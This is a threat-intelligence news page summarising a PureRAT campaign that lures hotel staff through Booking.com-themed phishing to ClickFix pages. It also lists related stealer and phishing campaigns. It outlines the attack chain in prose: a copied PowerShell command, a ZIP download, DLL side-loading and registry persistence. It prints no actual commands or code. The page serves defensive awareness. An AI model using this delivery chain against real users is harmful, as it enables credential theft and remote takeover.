Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

PureRAT ClickFix malware delivery chain targeting hotel systems

Malware Activity
First reported
Last updated
Happening score
H score 36
1 unique sources, 1 articles

Summary

Hide ▲

A PureRAT infection chain is actively targeting hotel systems, enabling credential theft, remote access, and command execution. The malware is delivered through ClickFix pages reached via spear-phishing emails that impersonate Booking.com. The infection flow uses PowerShell, a downloaded ZIP archive, and DLL side-loading to establish persistence. The activity has been observed since at least April 2025 and remained operational in early October 2025.

Related Happenings

Formbook phishing campaign using DLL sideloading and obfuscated JavaScript

Campaign
First: 20.04.2026 18:01 Last: 20.04.2026 18:01 Sources 1

About this happening: The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...

Open Happening

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Open Happening

Torg Grabber browser-extension theft activity

Malware Activity
First: 25.03.2026 20:32 Last: 25.03.2026 20:32 Sources 1

About this happening: The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...

Open Happening

FAUX#ELEVATE phishing campaign targeting French-speaking corporate environments

Campaign
First: 24.03.2026 18:35 Last: 24.03.2026 18:35 Sources 1

About this happening: The **FAUX#ELEVATE** phishing campaign is actively targeting **French-speaking corporate environments** with **fake resume/CV lures** that deliver malware for **credential theft**...

Open Happening

Silver Fox South Asia phishing campaign

Campaign
First: 24.03.2026 18:00 Last: 24.03.2026 18:00 Sources 1

About this happening: The **Silver Fox** campaign now includes **BYOVD** abuse of a previously unknown **WatchDog Anti-malware** driver, **amsdk.sys (version 1.0.600)**, to disable security tools on co...

Open Happening

Timeline

  1. 10.11.2025 11:11 2 articles · 6mo ago

    Sekoia discloses Booking.com impersonation campaign deploying PureRAT against hotels

    Initial Disclosure

    Sekoia described a massive phishing campaign against hotel establishments that impersonates Booking.com, sends malicious messages from compromised email accounts, and lures staff to ClickFix pages with a fake reCAPTCHA flow. Victims are prompted to copy and run a malicious PowerShell command that downloads a ZIP archive, loads PureRAT (aka zgRAT) through DLL side-loading, and establishes persistence with a Run registry key, enabling credential theft, remote access, data exfiltration, and fraudulent access to booking platforms such as Booking.com and Expedia. Sekoia assessed the activity as active since at least April 2025 and operational as of early October 2025.

    Show sources
    Open in new tab